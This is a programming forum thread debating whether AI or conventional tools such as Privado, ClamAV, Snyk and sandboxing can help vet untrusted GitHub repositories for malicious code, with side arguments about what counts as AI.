Any AI tool to analyse a git repo for malicious code?

Any AI tool to analyse a git repo for malicious code?
from unknowing8343@discuss.tchncs.de to programming@programming.dev on 31 Aug 2024 16:39
https://discuss.tchncs.de/post/21298994

I’m trying to feel more comfortable using random GitHub projects, basically.

#programming

threaded - newest

MajorHavoc@programming.dev on 31 Aug 2024 16:50 next collapse

Privado CLI will produce a list of data exfilration points in the code.

If the JSON output file points out a bunch of endpoints you don’t recognize from the README, then I wouldn’t trust the project.

Privado likely won’t catch a malicious binary file, but your local PC antivirus likely will.

thingsiplay@beehaw.org on 31 Aug 2024 16:50 next collapse

Not exactly what you asked, but related; roast your Github profile: github-roast.pages.dev

Kissaki@programming.dev on 01 Sep 2024 07:33 collapse

How is that related? I don’t see it.

thingsiplay@beehaw.org on 01 Sep 2024 09:35 collapse

It’s an AI tool analyzing a Git repo.

Kissaki@programming.dev on 04 Sep 2024 09:38 collapse

It doesn’t analyze only one repo

TootSweet@lemmy.world on 31 Aug 2024 21:00 next collapse

I don’t think “AI” is going to add anything (positive) to such a use case. And if you remove “AI” as a requirement, you’ll probably get more promising candidates than if you restrict yourself to “AI” (whatever that means) solutions.

unknowing8343@discuss.tchncs.de on 31 Aug 2024 22:49 collapse

I don’t care if the solution is AI based or not, indeed.

I guess I thought it like that because AI is quite fit for the task of understanding what might be the purpose of code in a few seconds/minutes without you having to review it. I don’t know how some non-AI tool could be better for such task.

Edit: so many people against the idea. Have you guys used GitHub Copilot? It understands the context of your repo to help you write the next thing… Right? Well, what if you apply the same idea to simply review for malicious/unexpected behaviour on third party repos? Doesn’t seem too weird for me.

TootSweet@lemmy.world on 31 Aug 2024 23:34 next collapse

AI is quite fit for the task of understanding what might be the purpose of code

Disagree.

I don’t know how some non-AI tool could be better for such task.

ClamAV has been filling a somewhat similar use case for a long time, and I don’t think I’ve ever heard anyone call it “AI”.

I guess bayesian filters like email providers use to filter spam could be considered “AI” (though old-school AI, not the kind of stuff that’s such a bubble now) and may possibly be applicable to your use case.

lemmyvore@feddit.nl on 01 Sep 2024 00:57 collapse

Bayesian filters are statistical, they have nothing to do with machine learning.

TootSweet@lemmy.world on 01 Sep 2024 01:05 next collapse

The A* algorithm doesn’t have anything to do with machine learning either, but the first time I ever learned about it was in a computer science class in college called something like “Introduction To Artificial Intelligence”.

But it’s very much the case that the term “AI” has a very different meaning now-a-days during this cringy bubble than it did back in 2004 or 2005 or whenever that was.

Today “AI” is basically synonymous with “BS”. Lol.

31337@sh.itjust.works on 01 Sep 2024 09:08 collapse

If you’re talking about naive bayes filtering, it most definitely is an ML model. Modern spam filters use more complex ML models (or at least I know Yahoo Mail used to ~15 years ago, because I saw a lecture where John Langford talked a little bit about it). Statistical ML is an “AI” field. Stuff like anomaly detection are also usually ML models.

Shareni@programming.dev on 31 Aug 2024 23:46 next collapse

AI is quite fit for the task of understanding

Sure, and parrots are amazing at spotting fallacies like cherry picking…

trashgirlfriend@lemmy.world on 31 Aug 2024 23:55 next collapse

AI is quite fit for the task

EXTREMELY LOUD INCORRECT BUZZER

FizzyOrange@programming.dev on 01 Sep 2024 09:25 collapse

Don’t listen to the idiots downvoting you. This is absolutely a good task for AI. I suspect current AI isn’t quite clever enough to detect this sort of thing reliably unless it is very blatant malicious code, but a lot of malicious code is fairly blatant if you have the time to actually read an entire codebase in detail, which of course AI can do and humans can’t.

For example the extra . that disabled a test in xz? I think current AI would easily be capable of highlighting it as wrong. It probably wouldn’t be able to figure out that it was malicious rather than a mistake yet though.

thesmokingman@programming.dev on 02 Sep 2024 04:31 collapse

I mean anything is a good fit for future, science fiction AI if we imagine hard enough.

What you describe as “blatant malicious code” is probably only things like very specific C&C domains or instruction sets. We already have very efficient string matching tools for those, though, and they don’t burn power at an atrocious rate.

You’ve given us an example so PoC||GTFO. Major code AI tools like Copilot struggle to explain test files with a variety of styles, skips, and comments, so I think you have your work cut out for you.

FizzyOrange@programming.dev on 02 Sep 2024 06:41 collapse

We already have very efficient string matching tools for those, though

How is a string matching tool going to find a single .?

You’ve given us an example so PoC||GTFO

🙄

thesmokingman@programming.dev on 02 Sep 2024 11:25 collapse

A single character, per your definition, is not blatant malicious code. Stop moving the goalposts.

It’s clear you don’t understand the space and you don’t seem to have any interest in acting in good faith based on your other comments so good luck.

FizzyOrange@programming.dev on 02 Sep 2024 13:34 collapse

I’m not moving any goalposts. The addition of the . was very blatant. They literally just added a syntax error. It went undetected because humans don’t have the stamina to exhaustively do code review down to that level. Computers (even AI) don’t have that issue.

You are clearly out of your depth here.

slazer2au@lemmy.world on 01 Sep 2024 07:36 next collapse

What do you consider malicious, specifically. Because AI are not magic boxes, they are regurgitation machines prone to hallucinations. You need to train it on examples to identify what you want from it.

unknowing8343@discuss.tchncs.de on 01 Sep 2024 08:48 collapse

I just want a report that says “we detected in line 27 or file X, a particular behavior that feels weird as it tries to upload your environment variables into some unexpected URL”.

slazer2au@lemmy.world on 01 Sep 2024 08:54 collapse

particular behavior that feels weird

Yea, AI doesn’t do feelings.

tries to upload your environment variables into some unexpected URL

Most of the time that is obfuscated and can’t be detected as part of a code review. It only shows up in dynamic analysis.

FizzyOrange@programming.dev on 01 Sep 2024 09:21 next collapse

AI doesn’t do feelings

It absolutely does. I don’t know where you got that weird idea.

superb@lemmy.blahaj.zone on 02 Sep 2024 19:07 collapse

Honey your AI girlfriend doesn’t actually love you

FizzyOrange@programming.dev on 02 Sep 2024 21:52 collapse

Define love. Good luck.

superb@lemmy.blahaj.zone on 03 Sep 2024 03:28 collapse

You’re right, I hope the two of you are very happy

TootSweet@lemmy.world on 06 Sep 2024 05:28 collapse

This absolutely sent me.

unknowing8343@discuss.tchncs.de on 01 Sep 2024 14:25 collapse

AI doesn’t do feelings

How can I have a serious conversation with these annoying answers? Come on, you know what I am talking about. Even an AI chatbot would know what I mean.

Any AI chatbot, even “general purpose” ones will read your code and will return a description of what it does if you ask it.

And particularly AI would be great at catching “useless”, “weird” or unexplainable code in a repository. Maybe not with the current levels of context. But that’s what I want to know, if these tools (or anything similar) exist yet.

Thank you.

FizzyOrange@programming.dev on 02 Sep 2024 16:18 collapse

Questions about AI seem to always bring out these naysayers. I can only assume they feel threatened? You see the same tedious fallacies again and again:

AI can’t “think” (using some arbitrary and unstated definition of the word “think” that just so happens to exclude AI by definition).
They’re stochastic parrots and can only reproduce things they’ve seen in their training set (despite copious evidence to the contrary).
They’re just “next word predictors” so they fundamentally are incapable of doing X (where X is a thing they have already done).

moonpiedumplings@programming.dev on 01 Sep 2024 07:43 next collapse

The solution to what you want is not to analyze the code projects automagically, but rather to run them in a container/virtual machine. Running them in an environment which restricts what they can access limits the harm an intentional — or accidental bug can do.

There is no way to automatically analyze code for malice, or bugs with 100% reliability.

unknowing8343@discuss.tchncs.de on 01 Sep 2024 08:49 next collapse

Of course, 100% reliability is impossible even with human reviewers. I just want a tool that gives me at least something, cause I don’t have the time or knowledge to review a full repo before executing it on my machine.

FizzyOrange@programming.dev on 01 Sep 2024 09:27 collapse

That is another tool you can use to reduce the risk of malicious code, but it isn’t perfect, so using sandboxing doesn’t mean you can forget about all other security tools.

There is no way to automatically analyze code for malice, or bugs with 100% reliability.

He wasn’t asking for 100% reliability. 100% and 0% are not the only possibilities.

anzo@programming.dev on 01 Sep 2024 09:53 collapse

Perhaps snyk.io I used it in the past, but I didn’t find it quite useful. Now I have a github action to upgrade dependencies every week. But you want some kind of scanner to be more involved on the actual codebase. Did you look into github.com/marketplace?query=security ? That’s what I would do. But I never heard of any of those listed there. Let us know your findings after some time if you test 'em ;) good luck!